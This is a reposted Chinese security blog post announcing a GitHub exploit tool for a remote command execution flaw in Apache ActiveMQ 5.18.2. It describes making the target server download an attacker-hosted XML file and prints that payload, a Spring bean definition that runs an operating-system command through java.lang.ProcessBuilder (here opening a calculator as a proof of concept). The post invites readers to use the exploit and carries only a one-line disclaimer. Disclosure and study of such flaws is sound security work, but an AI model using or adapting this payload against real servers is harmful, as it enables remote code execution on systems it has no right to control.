Apache - ActiveMQ 5.18.2 远程命令执行漏洞

admin 2023年10月30日02:08:41评论54 views字数 783阅读2分36秒阅读模式


仓库:https://github.com/JaneMandy/ActiveMQExploit

最近出了一个ActiveMQ 新漏洞,正好在参加活动的过程中,我们开发了一个相应的漏洞利用工具(Exploit)。

虽然我们不会深入详细分析这个漏洞,但已经有一些安全专家对其进行了分析。这个漏洞需要您搭建一个HTTP服务,我们的Exploit将发送Payload到目标服务器目标服务器会下载这个Payload,其中包含XML数据,并执行相关操作。我们希望所有安全专家都能充分利用这个漏洞,获得更多的洞察和经验。

Apache - ActiveMQ 5.18.2 远程命令执行漏洞

图:漏洞利用

Payload代码

<?xml version="1.0" encoding="utf-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>open</value> <value>-a</value> <value>calculator</value> </list> </constructor-arg> </bean></beans>

请勿用途,非法用途

原文始发于微信公众号(猫头鹰安全团队):Apache - ActiveMQ 5.18.2 远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月30日02:08:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache - ActiveMQ 5.18.2 远程命令执行漏洞https://cn-sec.com/archives/2152421.html

发表评论

匿名网友 填写信息